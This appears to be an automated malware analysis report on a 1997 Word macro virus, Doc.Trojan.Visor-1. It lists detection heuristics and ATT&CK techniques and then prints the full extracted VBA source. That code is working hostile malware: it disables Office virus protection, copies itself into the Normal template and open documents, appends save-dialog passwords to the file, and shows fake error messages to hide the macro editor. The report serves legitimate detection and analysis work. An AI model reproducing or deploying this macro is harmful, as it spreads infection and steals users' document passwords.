Verdict: MALICIOUS (Risk Score: 248)

MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder

Malware Insights
The sample is a legacy Word document containing VBA macros, specifically an AutoOpen macro, which is a common technique for malware execution upon opening. The macro attempts to copy itself to the Normal template and the current document, indicating a persistence mechanism. The ClamAV detection 'Doc.Trojan.Visor-1' further supports its malicious nature. The macro's functionality is primarily focused on self-propagation within the Office environment.
Heuristics (5)
- ClamAV: Doc.Trojan.Visor-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Visor-1
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Options.VirusProtection = False`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2354 bytes |

SHA-256: a1636e7bc936ac720091b593c72b0d4f1ada1d5db2247b8ca2ca06ad627110c3
Detection (ClamAV): Doc.Trojan.Visor-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Supervisor1"

Sub AutoNew()
    MacroCopy
End Sub

Sub AutoOpen()
    MacroCopy
End Sub

Function MacroCopy()
    Dim DocumentInstalled, GlobalInstalled As Boolean
    Dim i, x As Integer
    On Error GoTo hups
    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    DocumentInstalled = False
    GlobalInstalled = False
    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = "Supervisor1" Then
            DocumentInstalled = True
        End If
    Next
    For x = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(x).Name = "Supervisor1" Then
            GlobalInstalled = True
        End If
    Next
    If DocumentInstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, _
            Destination:=ActiveDocument.FullName, Name:="Supervisor1", _
            Object:=wdOrganizerObjectProjectItems
    End If
    If GlobalInstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
            Destination:=NormalTemplate.FullName, Name:="Supervisor1", _
            Object:=wdOrganizerObjectProjectItems
    End If
hups:
End Function

Function PWL()
    Dim dlg
    On Error GoTo hups:
    Set dlg = Dialogs(wdDialogFileSaveAs)
    Open ActiveDocument.FullName For Append As #1
    Print #1, "GPPW_" & dlg.Password & "GPWPW_" & _
        dlg.WritePassword
    Close #1
    ActiveDocument.Save
hups:
End Function

Sub ToolsMacro()
    MsgBox "Die angeforderte Application verursacht einen ungültigen Fehler im Modul 'Off97_bb.dll'" & Chr(13) & _
        "Bitte beheben Sie den Fehler und versuchen Sie es noch einmal.", vbCritical + vbOKOnly, "Microsoft Word"
End Sub

Sub Toolscustomize()
    ToolsMacro
End Sub

Sub ViewVBcode()
    ToolsMacro
End Sub

Sub PayLoad()
    'Author: Supervisor
    'Origin: Austria
    'Date: 1997-10-30
    'To ALL virus freaks:
    'The virus is a first-generation password thief
    'look forward to the 2nd generation too!
    'Saying of the day: "Knowledge is power"
End Sub